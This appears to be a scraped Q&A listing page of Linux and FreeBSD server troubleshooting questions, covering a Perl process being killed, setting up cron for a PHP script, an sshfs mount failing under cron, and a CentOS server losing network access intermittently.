    I run the perl script in screen (I can log in and check debug output). Nothing in the logic of the script should be capable of killing it quite this dead. I'm one of only two people with access to the server, and the other guy swears that it isn't him (and we both have quite a bit of money riding on it continuing to run without a hitch). I have no reason to believe that some hacker has managed to get a shell or anything like that. I have very little reason to suspect the admins of the host operation (bandwidth/cpu-wise, this script is pretty lightweight). Screen continues to run, but at the end of the output of the perl script I see "Killed" and it has dropped back to a prompt. How do I go about testing what is whacking the damn thing? I've checked crontab, nothing in there that would kill random/non-random processes. Nothing in any of the log files gives any hint. It will run from 2 to 8 hours, it would seem (and on my mac at home, it will run well over 24 hours without a problem). The server is running Ubuntu version something or other, I can look that up if it matters.

    Read the article

  • How do you set up CRON?

    - by user1723760
    I have never used CRON before but I want to use CRON in order to be able to perform schedule jobs for a php script. The php script is called "inactivesession.php" and in the php script is this code: <?php include('connect.php'); $createDate = mktime(0,0,0,10,25,date("Y")); $selectedDate = date('d-m-Y', ($createDate)); $sql = "UPDATE Session SET Active = ? WHERE DATE_FORMAT(SessionDate,'%Y-%m-%d' ) <= ?"; $update = $mysqli->prepare($sql); $update->bind_param("is", 0, $selectedDate); $update->execute(); ?> Wht I want to do is that when the above date is reached (25th Oct), I want the php script to perform the UPDATE statement above. But my question is that how do I use CRON in order to do this? The server I am using is the university's server known as helios, does CRON need to be set up in helios, (do I have to call the admin for this) or is it something else which uses CRON. I have never used CRON before so can you explain to me how CRON can be set up for the example above with the server I am using? Thanks UPDATE: Hi, I think the name of the OS is actually helios but I am not sure, I have a wikipedia page on this: here. I will read the crontab wikipedia page and see what I can find, but what my question is that is CRON already set up, do I just go right ahead and use CRON or do I need to set it up first?

    Read the article

  • Mounting fuse sshfs fails when invoked by Cron on FreeBSD 9.0

    - by Tal
    I have a remote server filesystem that I'm attempting to mount locally on a FreeBSD 9 machine via FUSE sshfs, and Cron for a backup routine. I have ssh keys between the boxes setup to allow for passwordless login as the root user on the local machine. Cron is set to run the following script (in Root's crontab): #!/bin/sh echo "Mounting Share" /usr/local/bin/sshfs -C -o reconnect -o idmap=user -o workaround=all <remote user>@<remote domain>.com: /mnt/remote_server As root, I can run this script on the command line without issue, and without being asked for a password the share mounts successfully. Yet, when run by Cron the script fails. The path to sshfs is identical to the value of which sshfs Here is the email root receives from the Cron Daemon: X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Mounting Share fuse: failed to exec mount program: No such file or directory fuse: failed to mount file system: No such file or directory I'm stumped as to why I'm receiving No such file or directory in this instance. It further seems odd given that the paths appear to be correct. I've also attempted to compare the output of env on the shell with env inserted into the script. I don't see any environment variables that should cause this trouble. At bootup, FUSE reports its version as: fuse4bsd: version 0.3.9-pre1, FUSE ABI 7.8 Help me ServerFault wizards, you're my only hope!

    Read the article

  • Linux Centos 6 becomes unavailable from time to time - OS&network issue

    - by adoado0
    I am encountering following problem. There is one server (DL160 G5) running Centos 6.3 with default kernel 2.6.32-220.2.1.el6.x86_64 - at this point I'd like to add that issue appeared also at older version - 6.1 and older kernel (do not remember exactly which version). There is cPanel installed and from time to time it becomes unavailable (network connection). What I've checked is (via KVMoIP): load average is completely normal it does not lack memory or disk space when problem occurs no console notifications checked all access logs and there is no sign that it can be caused by a client script cannot even access local interface (127.0.0.1) or main IP address running tcpdump I can only see packets arriving to server - no responses all services seem to be running properly (mail,sql,http,ssh) checked crontab and all clients' crontabs too network port utilisation is low ( up to several Mbits) arriving packet rate is low - hundreds per second (according to tcpdump) console (via kvmoip) works fine, no lags there is no conntrack at this server there is no ipv6 at this server flushing iptables, unloading modules does not resolve problem restarting network does not resolve problem, no errors appear it also occurs when two sepearate networks are configured (and multiple gateways) as well as one IP, one default gw and one network is configured - so it seems network configuration independent it seems to repeat randomly (load,packet rate,bandwith usage,load independent) checked server with different rootkit detection tools - it seems to be clean server has been rebooted, it did not change anything there are no interface errors it apperas randomly can be once a week or several times per day It usually works fine after 1-15 minutes. What I can also check? It is definitely OS issue - there is traffic at interface only in one direction when problem occurs, can not even ping loopback. Any ideas? Recommended checks? Anything I did not checked above.

    Read the article

< Previous Page | 7 8 9 10 11 12  | Next Page >